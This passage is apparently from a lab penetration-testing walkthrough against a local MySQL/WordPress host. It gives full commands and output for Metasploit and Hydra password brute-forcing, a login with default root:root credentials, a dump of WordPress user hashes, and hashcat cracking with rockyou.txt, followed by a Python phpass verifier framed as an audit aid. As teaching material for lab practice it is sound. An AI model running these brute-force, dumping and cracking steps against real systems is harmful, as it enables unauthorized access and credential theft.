           #  Name                                 Disclosure Date  Rank    Check  Description
           -  ----                                 ---------------  ----    -----  -----------
           0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility
        
        
        Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
        
        msf6 > use 0
        msf6 auxiliary(scanner/mysql/mysql_login) > show options 
        
        Module options (auxiliary/scanner/mysql/mysql_login):
        
           Name              Current Setting  Required  Description
           ----              ---------------  --------  -----------
           BLANK_PASSWORDS   true             no        Try blank passwords for all users
           BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
           DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
           DB_ALL_PASS       false            no        Add all passwords in the current database to the list
           DB_ALL_USERS      false            no        Add all users in the current database to the list
           DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted
                                                        : none, user, user&realm)
           PASSWORD                           no        A specific password to authenticate with
           PASS_FILE                          no        File containing passwords, one per line
           Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
           RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-met
                                                        asploit/basics/using-metasploit.html
           RPORT             3306             yes       The target port (TCP)
           STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
           THREADS           1                yes       The number of concurrent threads (max one per host)
           USERNAME          root             no        A specific username to authenticate as
           USERPASS_FILE                      no        File containing users and passwords separated by space, one pair p
                                                        er line
           USER_AS_PASS      false            no        Try the username as the password for all users
           USER_FILE                          no        File containing usernames, one per line
           VERBOSE           true             yes       Whether to print output for all attempts
        
        
        View the full module info with the info, or info -d command.
        
        msf6 auxiliary(scanner/mysql/mysql_login) > set VERBOSE false
        VERBOSE => false
        msf6 auxiliary(scanner/mysql/mysql_login) > set rhost 192.168.0.108
        rhost => 192.168.0.108
        msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
        PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
        msf6 auxiliary(scanner/mysql/mysql_login) > run
        
        [*] 192.168.0.108:3306    - Scanned 1 of 1 hosts (100% complete)
        [*] Auxiliary module execution completed

We try more exploits, or use Hydra:

hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt  -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt  mysql://192.168.0.108
        Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
        
        Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-19 19:15:31
        [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
        [DATA] max 4 tasks per 1 server, overall 4 tasks, 169512 login tries (l:168/p:1009), ~42378 tries per task
        [DATA] attacking mysql://192.168.0.108:3306/
        [ERROR] Child with pid 64180 terminating, can not connect
        [ERROR] Child with pid 64182 terminating, can not connect
        [ERROR] Child with pid 64181 terminating, can not connect
        [ERROR] Child with pid 64183 terminating, can not connect
        [ERROR] all children were disabled due too many connection errors
        0 of 1 target completed, 0 valid password found
        Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-19 19:15:56

In this case, the only way in is with the default credentials (root:root). Note that the Hydra run above aborted with connection errors ("can not connect") instead of finishing the list, so its "0 valid password found" is not a real negative result.

We poke around in MySQL:

mysql -u root -p -h 192.168.0.108
        Enter password: 
        Welcome to the MariaDB monitor.  Commands end with ; or \g.
        Your MariaDB connection id is 37
        Server version: 10.3.39-MariaDB-0+deb10u1 Debian 10
        
        Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
        
        Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
        
        MariaDB [(none)]> show databases;
        +--------------------+
        | Database           |
        +--------------------+
        | information_schema |
        | mysql              |
        | performance_schema |
        | wordpress          |
        +--------------------+
        4 rows in set (0,063 sec)
        
        MariaDB [(none)]> show tables;
        ERROR 1046 (3D000): No database selected
        MariaDB [(none)]> use wordpress;
        Reading table information for completion of table and column names
        You can turn off this feature to get a quicker startup with -A
        
        Database changed
        MariaDB [wordpress]> show tables;
        +-----------------------+
        | Tables_in_wordpress   |
        +-----------------------+
        | wp_commentmeta        |
        | wp_comments           |
        | wp_e_events           |
        | wp_links              |
        | wp_options            |
        | wp_postmeta           |
        | wp_posts              |
        | wp_term_relationships |
        | wp_term_taxonomy      |
        | wp_termmeta           |
        | wp_terms              |
        | wp_usermeta           |
        | wp_users              |
        +-----------------------+
        13 rows in set (0,001 sec)
        
        MariaDB [wordpress]> select * from wp_users;
        +----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
        | ID | user_login | user_pass                          | user_nicename | user_email           | user_url                   | user_registered     | user_activation_key                           | user_status | display_name    |
        +----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
        |  1 | admin      | $P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L. | admin         | [email protected]  | http://localhost/wordpress | 2023-06-15 14:30:02 |                                               |           0 | admin           |
        |  2 | hugo       | $P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90 | hugo          | [email protected]    |                            | 2023-06-15 14:32:39 | 1686839559:$P$Bp1eBXl/RR6RcMkYSytgzc1sHt6nml1 |           0 | hugo torres     |
        |  3 | philip     | $P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/ | philip        | [email protected]  |                            | 2023-06-15 14:33:13 | 1686839593:$P$BYVMku..4QUJUIzoUHMr8tdsv87TNK/ |           0 | philip padilla  |
        |  4 | vagrant    | $P$BkxK5UElDjCJU1dd19x9PExnko8//h/ | vagrant       | [email protected] |                            | 2023-06-15 14:34:18 | 1686839658:$P$B4eTfAbXY8.IA4sRYmBjlf0DKf0ohH/ |           0 | vagrant vagrant |
        +----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
        4 rows in set (0,001 sec)
        
        MariaDB [wordpress]> 

And we see hashed passwords, so we try to crack them with Hashcat:

hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
        * Filename..: /usr/share/wordlists/rockyou.txt
        * Passwords.: 14344385
        * Bytes.....: 139921507
        * Keyspace..: 14344385
        
        $P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L.:password               
        $P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/:password               
        $P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90:987654321
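To show what hashcat mode 400 is actually working on: the `$P$` prefix is the phpass "portable" hash WordPress stores in wp_users.user_pass, the fourth character encodes the MD5 iteration count and the next eight characters are the salt. The Python below is an added example, not code from the original post: it reimplements the phpass verification routine so a defender can audit a dumped wp_users table against a list of known-weak passwords offline and read the cost of each hash; the admin hash is copied from the dump above and the `hunter2` password used for the round-trip is a constructed sample.

```python
import hashlib
import hmac

# phpass "portable" hash as WordPress stores it in wp_users.user_pass (hashcat -m 400).
# Layout: "$P$" + cost char + 8-char salt + 22 chars of phpass-base64 over a 16-byte MD5 digest.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Admin hash copied from the wp_users dump above; hashcat reports it as "password".
PAGE_ADMIN_HASH = "$P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L."


def encode64(data: bytes) -> str:
    # phpass' own base64: little-endian 3-byte groups, 6 bits per char, no padding
    out = ""
    for j in range(0, len(data), 3):
        chunk = data[j:j + 3]
        value = int.from_bytes(chunk, "little")
        for k in range(len(chunk) + 1):
            out += ITOA64[(value >> (6 * k)) & 0x3F]
    return out


def phpass_rounds(setting: str) -> int:
    # The 4th character is the cost: its index in ITOA64 is log2 of the MD5 round count,
    # so 'B' (index 13) means 2**13 = 8192 rounds, which is why mode 400 cracks so fast.
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    log2 = ITOA64.find(setting[3])
    if not 7 <= log2 <= 30:
        raise ValueError("phpass cost out of range")
    return 1 << log2


def phpass_crypt(password: str, setting: str) -> str:
    # Recompute the hash for `password` under the cost and salt carried in `setting`
    rounds, salt, pw = phpass_rounds(setting), setting[4:12].encode(), password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(rounds):  # this loop is the only thing slowing a cracker down
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + encode64(digest)


def phpass_verify(password: str, stored: str) -> bool:
    # True only if `password` reproduces `stored`; malformed hashes never verify
    try:
        return hmac.compare_digest(phpass_crypt(password, stored), stored)
    except ValueError:
        return False


if __name__ == "__main__":
    print(phpass_rounds(PAGE_ADMIN_HASH), "rounds")
    print("admin hash matches 'password':", phpass_verify("password", PAGE_ADMIN_HASH))
```

Running `phpass_verify` over each user_pass value with a short list of known-weak passwords gives the same result as the hashcat run without leaving the host, and `phpass_rounds` flags sites still on the low-cost `$P$B` scheme.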